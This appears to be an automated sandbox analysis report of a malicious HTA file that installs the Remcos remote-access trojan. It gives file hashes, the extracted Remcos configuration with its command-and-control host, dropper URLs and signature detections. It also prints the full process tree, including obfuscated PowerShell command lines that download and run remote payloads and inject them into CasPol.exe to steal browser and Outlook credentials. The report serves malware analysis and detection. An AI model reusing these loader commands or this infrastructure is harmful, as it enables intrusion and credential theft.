Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-12-2024 15:03

General

  • Target

    mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta

  • Size

    15KB

  • MD5

    4d74c4d1eddb79b92e94ef09f3437eaa

  • SHA1

    f7add01e161ef9b7093cf672afe052648dd457da

  • SHA256

    96df1f20a2f78ef6665f8acdf0e9576ac4f7879ec61f5e90d1fcb2ecbb310281

  • SHA512

    bf4616e208b0b17c382df381eacaf3bccce0bb70311ca730a6316881cbe3b2f81494ec99e32d4dc8546556dbb487b9f3ac5b836c04e34d343053358a601a36f3

  • SSDEEP

    48:3EsYcJaFxYcJeMilzHIM7py4U2b6poz10daCa/bfUTTiuYcJFAVOPG:0LfgtlzF82bPpTTxg+

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

C2

brideeded.duckdns.org:3421

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-QYW18E

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4052
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1udickij\1udickij.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB297.tmp" "c:\Users\Admin\AppData\Local\Temp\1udickij\CSCF38948B9F6D6492EAD9C79A1E0B31BF9.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3080
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4396
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2976
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ipuxpieytgtaofdnnplwtbmtawpess"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1908
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tkzqqapzholfrlzrxayqeoykjdgnldmfz"
                7⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:4828
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vefir"
                7⤵
                  PID:3508
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vefir"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3460

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      0572fc6af5c0ca5deecf9a38d7a1d380

      SHA1

      28177f7eb971b8d14035419f01c9ad5d00e6bf9d

      SHA256

      d75980c3d9c87f97fa738dadc431f2701bc5a7e6dce12d21b41603c0335175d6

      SHA512

      fedf123b7889d8369ac2e39758cafb278d8cc11f97862178c8a3a21e130d3506a943588773743cc8a3c3b001202c1f705ee4ca53f8b4b3537627379e64019087

    • C:\Users\Admin\AppData\Local\Temp\1udickij\1udickij.dll

      Filesize

      3KB

      MD5

      27defc83246f4e16ac8d400d9608d8d0

      SHA1

      ef7dbe00bcb4925a05eabbe00ac668c067c1823b

      SHA256

      ff793e7f8f49f4236c7144a34ba74832218541607ec441ff6cd57b0c2bdbb260

      SHA512

      a33708d84e97341bd997decf29f8a9a7cbe60237ee4aec29f6685c809b363fa1879496ddb819014b48eae2cea3c06ae8b2cb674b5dad1e5cbd92b196208d220f

    • C:\Users\Admin\AppData\Local\Temp\RESB297.tmp

      Filesize

      1KB

      MD5

      e9f4d81be3b1c2891b84d0d5a182dcfd

      SHA1

      b5683a4cd56943f256fd0afa106a42f459d04123

      SHA256

      df89ae4f15a53d9b5d88c8f2b55c71a3f6f73a0daf07f62888d0b94391534ce3

      SHA512

      d51298ec613940673fc03ad8d574b37fa8c9a74c758a5cba9d4e7c9640a694a24e571e81d625f96013549974fd0ae60782f52b54b5fb8cdfdfee5a6470a1afff

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2fbqxhb.cnv.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs

      Filesize

      212KB

      MD5

      7f54fcc18cf1595a91bcf1c61df774cf

      SHA1

      298fae69662e298ac46e0e1be5fc679a0f527c22

      SHA256

      891e95aa7d15515df54f91606a27711c7c6bce4be800f6317e5f58843b0ecfb7

      SHA512

      3c368045ebe048ee7e8972e6dcaf92f60772c75a1a2d5cdaae7e6048aac8b7cb8fd266c6632b9b7ff17598162600ba517a71b4c9b90d564e0e7c4ebe193ed3ba

    • \??\c:\Users\Admin\AppData\Local\Temp\1udickij\1udickij.0.cs

      Filesize

      485B

      MD5

      b35ae42c67ac0de0078975c9c8744c14

      SHA1

      f85c1973cdf038ad851324c9c021d6b7cdb1db28

      SHA256

      3c45043d7ae00b5a57d1c20a68cbf81fe37151ed53e2ecd11a7d87ca4cec6442

      SHA512

      52e314313cab6577ad9592120009a35b61b2b00d2452ebd627cf5cd7d6e1dfe9cc94cb5dfa5b306867f6823f60bdffe24214b53ba1fc379c10e2908795bf05c5

    • \??\c:\Users\Admin\AppData\Local\Temp\1udickij\1udickij.cmdline

      Filesize

      369B

      MD5

      238004249e7c500d9e53812f3d3be157

      SHA1

      05b2e0f81ad59fffb55a1b00fafd235ace2398dd

      SHA256

      fb0ce2f77db5d1832aafb9f2a3d90be5569e36fd7f290ade791bc87f0ec9b436

      SHA512

      301105e8e1a395e1bbed94678818fa4038c60a5f10b7be84a6b2169952191e1e0e0f522050ee014ca481d3a9f47f34193e416c77ab83fc72a6e8259b253ac163

    • \??\c:\Users\Admin\AppData\Local\Temp\1udickij\CSCF38948B9F6D6492EAD9C79A1E0B31BF9.TMP

      Filesize

      652B

      MD5

      20473687a1b8b8782590bee90d48ff71

      SHA1

      15e71a915ba589d5f3f962e55f262a8cc07d5889

      SHA256

      24a98e064990f8ef6c3b27f220b6679d7fefd83be3d80d3b3f209cbaee5d3f92

      SHA512

      fda945515d4e7bd9d2986f07d0c3312b00b05fe00e5ee57a15d98094b834224f5151806e18f1bfd73c664c254e67530ae459d742319f5f938d6c53c30b462a98

    • memory/1204-84-0x0000000007B80000-0x0000000007C1C000-memory.dmp

      Filesize

      624KB

    • memory/1204-79-0x0000000005FD0000-0x0000000006324000-memory.dmp

      Filesize

      3.3MB

    • memory/1204-83-0x0000000007DC0000-0x0000000007F6A000-memory.dmp

      Filesize

      1.7MB

    • memory/1908-94-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/1908-96-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/2976-90-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-85-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-112-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-111-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-110-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-109-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-107-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-108-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-106-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-105-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-104-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-93-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-91-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-89-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-88-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2976-86-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/3132-6-0x0000000006220000-0x0000000006286000-memory.dmp

      Filesize

      408KB

    • memory/3132-44-0x0000000007EA0000-0x0000000007EBA000-memory.dmp

      Filesize

      104KB

    • memory/3132-19-0x0000000006900000-0x000000000694C000-memory.dmp

      Filesize

      304KB

    • memory/3132-58-0x0000000007E90000-0x0000000007E98000-memory.dmp

      Filesize

      32KB

    • memory/3132-18-0x00000000068B0000-0x00000000068CE000-memory.dmp

      Filesize

      120KB

    • memory/3132-64-0x0000000071A6E000-0x0000000071A6F000-memory.dmp

      Filesize

      4KB

    • memory/3132-65-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-17-0x0000000006300000-0x0000000006654000-memory.dmp

      Filesize

      3.3MB

    • memory/3132-70-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-23-0x000000006E490000-0x000000006E7E4000-memory.dmp

      Filesize

      3.3MB

    • memory/3132-7-0x0000000006290000-0x00000000062F6000-memory.dmp

      Filesize

      408KB

    • memory/3132-5-0x0000000005900000-0x0000000005922000-memory.dmp

      Filesize

      136KB

    • memory/3132-4-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-3-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-22-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-21-0x000000006E320000-0x000000006E36C000-memory.dmp

      Filesize

      304KB

    • memory/3132-45-0x0000000007E90000-0x0000000007E98000-memory.dmp

      Filesize

      32KB

    • memory/3132-20-0x0000000007870000-0x00000000078A2000-memory.dmp

      Filesize

      200KB

    • memory/3132-0-0x0000000071A6E000-0x0000000071A6F000-memory.dmp

      Filesize

      4KB

    • memory/3132-43-0x0000000007E60000-0x0000000007E74000-memory.dmp

      Filesize

      80KB

    • memory/3132-42-0x0000000007E50000-0x0000000007E5E000-memory.dmp

      Filesize

      56KB

    • memory/3132-2-0x0000000005990000-0x0000000005FB8000-memory.dmp

      Filesize

      6.2MB

    • memory/3132-33-0x00000000078B0000-0x00000000078CE000-memory.dmp

      Filesize

      120KB

    • memory/3132-34-0x0000000007B70000-0x0000000007C13000-memory.dmp

      Filesize

      652KB

    • memory/3132-35-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-1-0x0000000005320000-0x0000000005356000-memory.dmp

      Filesize

      216KB

    • memory/3132-36-0x0000000071A60000-0x0000000072210000-memory.dmp

      Filesize

      7.7MB

    • memory/3132-41-0x0000000007E20000-0x0000000007E31000-memory.dmp

      Filesize

      68KB

    • memory/3132-40-0x0000000007EC0000-0x0000000007F56000-memory.dmp

      Filesize

      600KB

    • memory/3132-39-0x0000000007CA0000-0x0000000007CAA000-memory.dmp

      Filesize

      40KB

    • memory/3132-38-0x0000000007C20000-0x0000000007C3A000-memory.dmp

      Filesize

      104KB

    • memory/3132-37-0x00000000082A0000-0x000000000891A000-memory.dmp

      Filesize

      6.5MB

    • memory/3460-99-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/3460-98-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4828-97-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4828-95-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB